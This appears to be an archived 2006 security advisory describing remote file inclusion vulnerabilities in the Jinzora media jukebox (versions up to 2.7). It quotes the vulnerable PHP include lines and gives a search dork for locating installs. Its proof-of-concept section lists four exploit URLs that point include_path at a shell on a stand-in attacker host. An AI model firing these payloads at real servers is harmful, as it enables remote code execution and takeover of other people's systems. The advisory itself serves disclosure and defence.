Jinzora <= 2.7 (include_path) Multiple Remote File Include Vulnerabilities

2006-12-25T00:00:00
ID SECURITYVULNS:DOC:15484
Type securityvulns
Reporter Securityvulns
Modified 2006-12-25T00:00:00

Description

+------------------------------------------------------------------------------------------- + Jinzora <= 2.7 (include_path) Multiple Remote File Include Vulnerabilities +------------------------------------------------------------------------------------------- + Vendor ............: http://www.jinzora.com/ + Affected Software .: Jinzora <= 2.7 + Download ..........: http://www.jinzora.com/downloads/j2.7.tar.gz + Description .......: "Jinzora enables you to stream your digital music and videos to any internet connected computer using a web browser" + Dork ..............: "Jinzora Media Jukebox" + Class .............: Remote File Inclusion + Risk ..............: High (Remote File Execution) + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us> +------------------------------------------------------------------------------------------- + Details: + Jinzora has several scripts which do not initialize variables before using them to include + files, assuming register_globals = on, we can initialize any one of the variables in a query + string and include a remote file of our choice. + + Vulnerable Code: + popup.php, line(s) 01-27: + -> 01: <?php define('JZ_SECURE_ACCESS','true'); + -> 27: include_once('jzBackend.php'); //jzBackend.php is being included before the include_path var is set + jzBackend.php, line(s) 40-77: + -> 01: <?php if (!defined(JZ_SECURE_ACCESS)) die ('Security breach detected.'); + -> 40: @include($include_path."settings.php"); //assumes the include_path var has been set + -> 77: include($css); + rss.php, line(s) 01-35: + -> 01: <?php define('JZ_SECURE_ACCESS','true'); + -> 35: include_once('backend/backend.php'); + backend/backend.php, line(s) 02-42: + -> 02: if (!defined(JZ_SECURE_ACCESS)) die ('Security breach detected.'); + -> 42: include_once($include_path. 'system.php'); //assumes the include_path var has been set + ajax_request.php, line(s) 01-32: + -> 01: <?php define('JZ_SECURE_ACCESS','true'); + -> 32: require_once('jzBackend.php'); //see jzBackend.php above for vulnerable code + mediabroadcast.php, line(s) 01-42: + -> 01: <?php define('JZ_SECURE_ACCESS','true'); + -> 42: include_once('backend/backend.php'); //see above for vulnerable code + + Proof Of Concept: + http://[target]/[path]/popup.php?include_path=http://evilsite.com/shell.php? + http://[target]/[path]/rss.php?include_path=http://evilsite.com/shell.php? + http://[target]/[path]/ajax_request.php?include_path=http://evilsite.com/shell.php? + http://[target]/[path]/mediabroadcast.php?include_path=http://evilsite.com/shell.php? +-------------------------------------------------------------------------------------------